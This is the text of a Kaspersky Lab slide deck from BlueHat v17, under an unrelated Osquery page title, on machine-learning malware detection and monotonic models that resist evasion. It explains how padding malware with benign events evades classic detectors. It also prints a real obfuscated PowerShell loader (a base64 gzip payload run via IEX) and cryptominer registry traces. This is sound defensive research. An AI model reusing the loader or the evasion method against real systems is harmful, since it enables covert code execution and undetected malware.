BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery

Detection is not a classification:
reviewing machine learning
techniques for
cybersecurity specifics
Alexander Chistyakov
Research-Developer, Kaspersky Lab

2
Presentation plan [short]
1. Construct a powerful ML-based malware detector
2. Hack it and avoid the detection
3. Construct the new one and make it invulnerable

3
Presentation plan [detailed]
1. ML in cybersecurity: basic pipeline overview
2. Issues in classical ML detectors
• White box and black box attacks
• Suffering with false alarms
• Real-time detection problem
• Unclear reasons for detection
3. Reviewing the basis: constructing secure ML detectors
• Providing the invulnerability to the model
• Effective update of the model’s formula using false positives
• Effective and interpretable detection in the real-time mode
And also: discoveries, demonstrations and a bit of math ...

Benign file
Check next file
4
Basic detection pipeline with machine learning
Labeled as
malware?
Collect
training data
Train selected
model
Extract features
from samples
Provide labels
to samples
Select classifier’s
architecture
Take new item
(test data)
Predict test
item’s label
Setup detection
thresholds
Malicious file
Rise an alarm
NO
YES
In-lab training stage In-product testing stage

5
Vulnerabilities
in classical
machine learning

6
Malicious behavior detection
Pros:
1. Fileless threats processing
2. Hard to obfuscate
3. Detection of attacks based on benign software
Cons:
1. High risks for the system when analyzing a malicious sample
2. The risk of missing the hidden channels
3. Possible performance drawdown
Why «machine learning»?
1. Thousands of samples per day
2. Hundreds / thousands of events per sample
3. Complex dependencies are matter
ProcessStart(0)
LoadLibrary("c:windowssystem320c990d93e8c77d7549b1cf3d2.exe")
LoadLibrary("c:windowssystem32ntdll.dll")
LoadLibrary("c:windowssystem32kernel32.dll")
LoadLibrary("c:windowssystem32kernelbase.dll")
LoadLibrary("c:windowssystem32winmm.dll")
CreateThreadLocal(3471)
LoadLibrary("c:windowssystem32shell32.dll")
LoadLibrary("c:windowssystem32shlwapi.dll")
LoadLibrary("c:windowssystem32wshtcpip.dll")
LoadLibrary("c:windowssystem32wshqos.dll")
RegCreateKey("hklmsystemcontrolset001servicestcpipparameters")
RegCreateKey("hklmsoftwaremicrosoftsystemcertificatestrust")
RegCreateKey("hkcusoftwaremicrosoftsystemcertificatesca")
LoadLibrary("c:windowssystem32iphlpapi.dll")
LoadLibrary("c:windowssystem32crypt32.dll")
CreateThreadLocal(2920)
RegCreateKey("hkcusoftwaremicrosoftsystemcertificatesmy")
ModifyFile("c:program files7-zip7zcon.sfx")
RenameFile("c:program files7-zip7zcon.sfx“,
"c:program files7-zip7zcon.sfx.xoxoxo")
CreateFile("c:program files7-ziphistory.txt",[48495344F59206F66])
ModifyFile("c:program files7-ziphistory.txt")
ModifyFile("c:python26libidlelibcredits.txt.xoxoxo")
RenameFile("c:python26libidlelibcredits.txt.xoxoxo",
"c:python26libidlelibcredits.txt")
FileModified("c:program filesidacfgdsp563xx.cfg.xoxoxo")
RenameFile("c:program filesidacfgdsp563xx.cfg.xoxoxo",
"c:program filesidacfgdsp563xx.cfg")
...

7
Linear models
LOAD LIBRARY
CREATE FILE
INJECT TO
PROCESS
MODIFY SERVICE
CREATE SERVICE
MODIFY
REGISTRY
BIAS CONSTANT
10
3
1
0
1
0
1
2.47 0.922
Malicious file
Input features Linear transformation
Model’s output

8
Linear models
10
3
1
0
1
0
1
2.47 0.922
Malicious file
EASY TO IMPLEMENT
EASY TO TRAIN
EASY TO UNDERSTAND
LOAD LIBRARY
CREATE FILE
INJECT TO
PROCESS
MODIFY SERVICE
CREATE SERVICE
MODIFY
REGISTRY
BIAS CONSTANT

9
Linear models
10
1
0
1
0
1
-3.62 0.027
Benign file
200
EASY TO IMPLEMENT
EASY TO TRAIN
EASY TO UNDERSTAND
EASY TO HACK
LOAD LIBRARY
CREATE FILE
INJECT TO
PROCESS
MODIFY SERVICE
CREATE SERVICE
MODIFY
REGISTRY
BIAS CONSTANT

10
Neural network
10
3
1
0
1
0
1
3.29
-4.3
0.13
2.54 0.927
1
Hidden layer
Model’s output
Input features Linear transformation
Linear transformation
Malicious file
LOAD LIBRARY
CREATE FILE
INJECT TO
PROCESS
MODIFY SERVICE
CREATE SERVICE
MODIFY
REGISTRY
BIAS CONSTANT

11
Neural networks
10
3
1
0
1
0
1
3.29
-4.3
0.13
1
Malicious file
LOTS OF OPEN LIBRARIES
NONLINEAR MULTILAYER
ARCHITECTURES
GOOD PERFORMANCE AND
DETECTION QUALITY
LOAD LIBRARY
CREATE FILE
INJECT TO
PROCESS
MODIFY SERVICE
CREATE SERVICE
MODIFY
REGISTRY
BIAS CONSTANT
2.54 0.927

12
Neural networks
10
1
0
1
1
1.17
-2.3
0.61
-2.47 0.078
1
Benign file
STILL HACKABLE
LOTS OF OPEN LIBRARIES
NONLINEAR MULTILAYER
ARCHITECTURES
GOOD PERFORMANCE AND
DETECTION QUALITY
12
17
LOAD LIBRARY
CREATE FILE
INJECT TO
PROCESS
MODIFY SERVICE
CREATE SERVICE
MODIFY
REGISTRY
BIAS CONSTANT

Advanced black-box attacks setup
No access to model’s weights…
… or architecture …
… or output scores
Just train your own model on victim’s detections,
and hack it to bypass the target detector

Behavior neural network detection quality

Dynamic classification issue [DEMO: Trojan.Win32.BitMiner]

Dynamic classification issue [DEMO: Google Chrome]

Dynamic classification issue [DEMO: Google Chrome]
FALSE ALARM

False alarms issue
False alarm
Malware detection
is an
undecidable
problem
Therefore, we will always have
some mistakes

False alarms issue
1. Create a white list:
+ fast
- need to choose radius
- loosing of detections
- complex surface
- unlimited growth of memory

False alarms issue
1. Create a white list:
+ fast
- need to choose radius
- complex surface
- unlimited growth of memory
2. Retrain the model:
+ same memory usage
- time expensive

Key issues of machine learning:
1.Models are unstable
2.Hard to fix errors
3.Hard to interpret
4.Models are vulnerable

24
Constructing secure
machine learning
detectors

25
No malicious code
could become clean
after the injection
of any new functionality

26
Secure linear models
10
3
1
0
1
0
1
2.47 0.922
Malicious file
MONOTONIC FEATURES
NONNEGATIVE WEIGHTSLOAD LIBRARY
CREATE FILE
INJECT TO
PROCESS
MODIFY SERVICE
CREATE SERVICE
MODIFY
REGISTRY
BIAS CONSTANT

27
Secure linear models
10
0
0
1
0
1
2.68 0.935
Malicious file
200
MONOTONIC FEATURES
CREATE FILE
INJECT TO
PROCESS
MODIFY SERVICE
CREATE SERVICE
MODIFY
REGISTRY
BIAS CONSTANT

28
Secure neural networks
10
3
1
0
1
0
1
0.29
1.34
0.13
2.47 0.922
1
Malicious file
MONOTONIC ACTIVATION
FUNCTIONS
MONOTONIC FEATURES
CREATE FILE
INJECT TO
PROCESS
MODIFY SERVICE
CREATE SERVICE
MODIFY
REGISTRY
BIAS CONSTANT

29
10
3
1
0
1
0
1
2.47 0.922
Malicious file
5.02
3.29
2.47
2.47
0.17
1.26
7.31
0.17
-1.2
0.19
7.66
-1.2
Daniels, Hennie, and Marina Velikova. "Monotone and partially monotone neural networks.“
IEEE Transactions on Neural Networks 21.6 (2010): 906-917.
MONOTONIC ACTIVATION
FUNCTIONS
MONOTONIC FEATURES
NONNEGATIVE WEIGHTS
MIN-MAX POOLING
OUTPUT LAYER
K-LAYERS ARCHITECTURE FOR
K-DIMENTIONAL DATA
LOAD LIBRARY
CREATE FILE
INJECT TO
PROCESS
MODIFY SERVICE
CREATE SERVICE
MODIFY
REGISTRY
BIAS CONSTANT

30
…
ModifyFile(“notepad.exe”)
CreateFile(“config.xml”,0644)
CreateFile(“doc1.rtf”,0755)
ModifyFile(“doc1.rtf”)
CreateFile(“list.rtf”,0755)
ModifyFile(“list.rtf”)
ModifyFile(“config.xml”)
DeleteFile(“doc1.rtf”)
DeleteFile(“list.rtf”)
…
Delete
File
Create
File
Modify
File
list.rtf
notepad.exe
config.xml
doc1.rtf
0644
0755
Delete
File
Create
File
Modify
File
list.rtf
doc1.rtf
Modify
File list.rtf
notepad.exe
config.xml
doc1.rtf
Create
File
list.rtf
config.xml
doc1.rtf
0644
0755
Create
File
Modify
File
list.rtf
config.xml
doc1.rtf
2.47 0.922
Malicious
file
CREATE FILE
MODIFY FILE
DELETE FILE
DNS REQUEST
BIAS CONSTANT
4
4
2
0
1

31
Detection with monotonic models [DEMO: Trojan.Win32.BitMiner]

32
Detection with monotonic models [DEMO: Google Chrome]

33
Secure decision trees
0 40
6
12
18
24
8020 60
Cβ
Cα
NO YES
Cβ > 12
NO YES
YESNO
Malicious
file
Benign
file
Benign
file
Malicious
file
Cα > 70 Cα > 12

34
0 40
6
12
18
24
80
Cβ
Cα20 60
NO YES
Cβ > 12
NO YES
YESNO
Malicious
file
Benign
file
Benign
file
Malicious
file
Cα > 70 Cα > 20

35
0
6
12
18
24
40 8020 60
Cβ
Cα
Suspicious
file (25%)
Suspicious
file (50%)
NO YES
Cα > 40
NO YES
YESNO
Malicious
file
Benign
file
Cβ > 6 Cβ > 12

36
0
6
12
18
24
40 8020 60
Cβ
Cα
Suspicious
file (25%)
Suspicious
file (50%)
NO YES
Cα > 40
NO YES
YESNO
Malicious
file
Benign
file
Cβ > 6 Cβ > 12
NOT MONOTONIC

37
0
6
12
18
24
40 8020 60
Cβ
Cα
YES
YES
Cα > 40
YES
YES
NO
Malicious
file
Benign
file
Cβ > 6
Suspicious
file (60%)
Suspicious
file (33%)
Cβ > 12
Cβ > 12 Cβ > 6
Benign
file
Benign
file
YES
NO NO
NO
NO
Potharst, Rob, and Adrianus Johannes Feelders. "Classification
trees for problems with monotonicity constraints." ACM SIGKDD
Explorations Newsletter 4.1 (2002): 1-10.

Monotonic models toolbox
1. Artificial neural networks
• Dropout
• Batch / Weight normalization
• Min / Max / Average-pooling layers
• Autoencoders
• Recurrent networks
2. Decision trees
3. Classification ensembles
• Random forest
• AdaBoost
• Gradient boosting (including XGBoost)
4. Kernel-SVM
5. Nonparametric methods
• k-NN
• Parzen-window density estimator
6. …

Fixing false alarms in the monotonic space
False alarm
1. Detect a problem with
false positives

false positives
2. Identify the area of benign
behavior

false positives
2. Identify the area of benign
behavior
3. Join the benign area
boundary with your
model’s decision rule

44
Model's output
interpretation

Case #1: Trojan.Win32.BitMiner
More than 200K users affected
Score | Event
------------------------------------------------------------------------------------------------------------
2.734 | RegCreateKey("$hklmsoftwareminergateorganizationdefaultsminersmro")
2.737 | RegSetValue("$hklmsoftwareminergateorganizationdefaultsminersmro","visible","true")
4.238 | RegSetValue("$hklmsoftwareminergateorganizationdefaultsminersmro","pool","xmr.pool.minergate.com:45560")
Score | Event
-------------------------------------------------
-2.083 | RegCreateKey("$hklmsystemcontrolset001
| servicesdirectx11b")
-2.083 | RegSetValue("$hklmsystemcontrolset001
| servicesdirectx11b","imagepath",
| ""$appdataDirectX11bSystem.exe"")
-1.175 | InstallMd5("$appdatadirectx11bsystem.exe",
| 0x4635935FC972C582632BF45C26BFCB0E)
Score | Event
------------------------------------------------------------
-0.077 | WriteProcessMemory("bi16.cmd",0x000000007EFDF368,0,0,8)
-0.077 | ResumeThread("bi16.cmd")
-0.077 | LoadLibrary("$windirregedit.exe")
0.733 | CreateProcess("$windirregedit.exe",""$windirregedit.exe" /s "Bi1.reg"",0x2E2C937846A0B8789E5E91739284D17A)
0.734 | CreateProcessInt("$windirregedit.exe",""$windirregedit.exe" /s "Bi1.reg"",0x2E2C937846A0B8789E5E91739284D17A)

Case #2: Shellcode execution via powershell
CreateProcess("$system32windowspowershellv1.0powershell.exe",
""powershell.exe" -nop -w hidden -c $s=New-Object IO.MemoryStream( ,
[Convert]::FromBase64String(
'H4sIAKAhylkCA71W62/aSBD/nEr9H6wKCaOjYCdA00iVzk9wwjMG8zpUGXuxN6wf8SOY9Pq/
3yzYCb0mVa4fzkJiHzM7v/nNzM5uUt9KcOAzyB1EnsaP2jbz7f27s6EZmR7Dlrb2NKgypcxoV
s7OYL20vwvnm9kFavck5gvDLoUwlAPPxP7q6kpKowj5yXFea6NEiGPkrQlGMVth/mamLorQx8
H6DlkJ840pfa21SbA2SS62l0zLRcxHwbfpXjewTAqtpocEJ2z5r7/KleVHflVT7lOTxGxZ38c
J8mo2IeUK871CDY73IWLLPWxFQRxsktoU+xfntYkfmxvUh9MeUA8lbmDH5Qo4A78IJWnkM6du
0XOOUmwZhsMosATbjlAMSjXNfwi2iC35KSFV5k92mYO4Tf0Eewj2ExQFoY6iB2yhuNYxfZugW
7RZsX20K3x/qxJ7qgRSwySqVCEqr6PtBXZK0PGAcuVnvIeAVuDLgwo0fH//7v27TZEHJMuC9R
oHPe/xNBFgdLY8jBFgZYdBjA/iXxiuyvTAnJkE0R6mpXGUosqKWdJQLFcroLbVHHHiY/X1I/h
CHqTvv87mjqbA6tIIsL0CrTxUJTs17udfW3Tr9ayT0Qb7SN77poetIrHYl8hHG4IOPtcKsT5A
Y8v5BrJlRJBjJpTHKrP8WU3xcPKkK6aY2CgSLAhgDKggtpUfwRxDw5Y1v4c8IOs4L0MgNpDOq
JDOU3hfWKdzECpLxIzjKjNMoZ6sKqMjkyC7ygh+jPMtIU2Cw7D8DLeXkgRbZpwUx60qJ1TmJq
XAj5MotSCE4P5YD5GFTULZqDIdbCNxr2OnMF1+kQvJJAT7Dpz0ALGAFcqBntDEiABlkQSVmo4
SzQsJ8kDsUN4qMR0o5rwWDslkOsguv4CzyPNjUlNSCjZOUEKkdRIkVcbAUQIXBSU4T6rfxnFy
URSIpAjlwWGLGlqK+4SmfCmzxpe7YKDo8qVAszWn60BOlAAxahR4ohmjVkNPIqCN/VBXsNwcy
sGjAJ+i3o4MUZ8YC61nXxNdS/S5grsT19Uwrzkw308UZ5hw4c143LnW5Y4QyZm7EbRYUzrifs
SLgtXBn4xrcTIBPSx1R3eZJtii58ycubTThu5MA0NS19Ec+Bc11xK5BeeInCp1ddFVMCc4+qg
zavALrX5JRPyoa7rQmT7Ze7KjNBqdWTYW+r1rwVUHtsqfqwf9LdVfbNtdWTnMLTofzWMFK2BH
Uecjw0VTIxSniroYGaHm/LFzRka33lBdEdY1nHVDvQ4fzwMPyVhfNy/MaTNcewYHHE11zXd1a
yONO5Yn1uvGhO9rGKnj6ZbLdgqX7Y0+6AQtw/d8SqswrBst8TDKBvIk7d0Ju+6dkvVxI+vfbY
XpFl/vJn5n141BSuz3LDKenAfyhPNaRsPbZJQqQa7zyJnQUff8liw8lV93Rul81t8h6XO7xxG
vD3xii+JQ55SvCYcbgnzjuAfT4ghwXmeX3cjQG5/qnw2QXdxL5LOGN+p9hw91UxMgDcRrjMR7
EbjR1yF/G7bahQ/gdzbhQ8CXY+QAM+ba7c5DnZ/PBFvva9llW1N2ggC6yqU8c550h/WhLXSji
Pr5IPEBWdd5o78wt6Kpz/3bHdJGwCmYp3notaY3t+PmKPd7gsdHjm2KVcN2CH4IAs0k0G0C11
B5Pn7GOVQ0DfDcND28szXBGqi7zkyfqnfyB1pWUFclF12elMhrHbFnRrFrEigd6HHFVaYGkZq
3rWGAqQbLnjxjtijyEYH2Dw+E4jIQCAks2kJP2xx08WNvXcHVNoHhxfmLowrzJFh5bq3F0tXV
AiDTtnpS/bUu8p3ErXLZBcdBp+SyBgeev91dKQj37A9HVmnHpbT92xQ5mKrQm6iEB/Z0+H/wm
l+DLvzZb+T1ee0Xu2/imqseePhp9ceF/8T3b9IwNXEC8jrc5QQd3xm/ZCNPqJMH2iFikCeb/K
Pv5UGafOzDw+0fYnWge6ULAAA=‘
));IEX (New-Object IO.StreamReader(New-Object
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress
))).ReadToEnd();",0xF7722B62B4014E0C50ADFA9D60CAFA1C)

Case #4: ML detector against zero day threat:
 In October 2017 we have spotted BlackOasis activity. In this
attack flash zero day exploit was used -
https://securelist.com/blackoasis-apt-and-new-targeted-
attacks-leveraging-zero-day-exploit/82732/
 After successful execution of vulnerability payload is
executed
 In this attack a special technique for payload execution was
used:
• Special service was created
• Main malware modules were dropped to
%programdata%
• Modules included a legitimate utility
adaptertroubleshooter.exe
• This utility was used to load main malware module via
DLL hijacking

LET’S TALK?
Kaspersky Lab HQ
39A/3 Leningradskoe Shosse
Moscow, 125212, Russian Federation
Tel: +7 (495) 797-8700
www.kaspersky.com
49

BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery

More Related Content

What's hot

Similar to BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery

More from BlueHat Security Conference

Recently uploaded

BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery